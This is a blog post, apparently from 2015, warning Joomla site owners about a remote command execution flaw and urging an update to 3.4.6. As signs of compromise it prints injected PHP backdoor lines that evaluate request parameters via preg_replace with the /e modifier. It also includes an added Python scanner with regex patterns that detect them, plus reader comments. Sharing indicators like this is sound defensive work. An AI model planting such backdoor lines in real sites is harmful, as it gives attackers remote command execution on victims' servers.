Very Important: Update to Joomla 3.4.6 Immediately!

There is a serious vulnerability that can be easily exploited and is already in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla

If you are using Joomla 3, please update immediately to Joomla 3.4.6.

Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are handled (details here). As a result, some of your extensions might no longer work after upgrading to Joomla 3.4.7. I would suggest that you update to Joomla 3.4.6 first and test that all extensions are working before you update to Joomla 3.4.7.

How to Check

I have quite a number of friends who are being hit by this.

Some signs of being attacked are as follows. Take a look at your <Joomla_Root_Folder>/index.php or <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site is being hit.

  1. The following from <Joomla_Root_Folder>/index.php:

    <?php

    if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}

    if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}

    if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}

    if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}

    if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}


    /**
     * @package    Joomla.Site
     *
     * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
     * @license    GNU General Public License version 2 or later; see LICENSE.txt
     */


  2. The following from <Joomla_Root_Folder>/includes/framework.php:

    <?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_FOR"], "JDatabaseDriverMysqli") !== false) exit;
    /**
     * @package    Joomla.Site
     *
     * @copyright  Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
     * @license    GNU General Public License version 2 or later; see LICENSE.txt
     */
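
The two signs above can be checked across a whole site with a small scanner. This is an added example, not code from the original post or from the Joomla project; the names scan_text and scan_tree and the indicator labels are made up for illustration, and matching $_GET/$_POST/$_COOKIE in addition to $_REQUEST goes beyond the samples shown.

```python
"""Scan PHP files for the two injected snippets shown above (added example)."""
import os
import re
import sys

# Indicator 1: preg_replace() with the /e (eval) modifier whose replacement
# argument is taken straight from request data. $_GET/$_POST/$_COOKIE are an
# assumption added here; the samples on the page only use $_REQUEST.
EVAL_BACKDOOR = re.compile(
    r"""preg_replace\s*\(\s*(['"])/.*?/[a-zA-Z]*e[a-zA-Z]*\1\s*,\s*@?\s*"""
    r"""\$_(?:REQUEST|GET|POST|COOKIE)\b""")
# Indicator 2: a guard comparing a request header with the string
# "JDatabaseDriverMysqli", as in the framework.php sample.
HEADER_GUARD = re.compile(
    r"""stripos\s*\(\s*\$_SERVER\s*\[[^\]]*\]\s*,\s*(['"])JDatabaseDriverMysqli\1""")

INDICATORS = {"eval-backdoor": EVAL_BACKDOOR, "header-guard": HEADER_GUARD}


def scan_text(text):
    """Return (line_number, indicator_name) hits for one file's text."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits


def scan_tree(root):
    """Walk root and return {path: hits} for every .php file with a hit."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for filename in files:
            if filename.lower().endswith(".php"):
                path = os.path.join(folder, filename)
                # errors="replace" keeps the scan going on odd encodings.
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits = scan_text(handle.read())
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    found = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, hits in sorted(found.items()):
        for number, name in hits:
            print(f"{path}:{number}: {name}")
    sys.exit(1 if found else 0)
```

Pass the Joomla root folder as the first argument. A hit confirms the file was modified, but a run with no hits does not prove the site is clean, since only these two patterns are checked.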
    

How to Update

Please apply the following patch immediately:

  • Joomla 3 and above: Joomla 3.4.6.
  • Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are handled (details here). As a result, some of your extensions might no longer work after upgrading to Joomla 3.4.7. I would suggest that you update to Joomla 3.4.6 first and test that all extensions are working before you update to Joomla 3.4.7.

  • Old (unsupported) versions 1.5.x and 2.5.x: You may apply the security hotfixes here. This article from OSTraining explains how to apply them.

Comments   

-2 # Brian 2015-12-28 11:15
Just had this happen to me, thought it was a small problem at first because I couldn't access most things in the back end, getting a 500 error, check the PHP logs and was getting "syntax error, unexpected ':' in \sidebars\submenu.php on line 101". So I check that guy out and see very similar lines of code to the ones you have showing for index.php, Google search it and get this https://github.com/joomla/joomla-cms/issues/8741. So the first comment says your site's been hacked. So do some more searching and see some other people with similar problems, they said they just changed the file to the one on the Joomla GitHub, but I know that's clearly not what they used to change the files. So I run a Windows search on my website for the files modified by date, and get about 20 files that were modified on the same date with the top being modified with those lines. The first two were different though which were cookiestest.php and defaults.php. default.php could modify other files.
+3 # kksou 2015-12-29 01:10
Hi Brian,

Yes, it's actually quite "scary" to see so many files being changed. But no worries, if you have a full backup some time before Dec 10, restore the whole site and update your Joomla to 3.4.6, it should be fine.

Warm Regards,
/kksou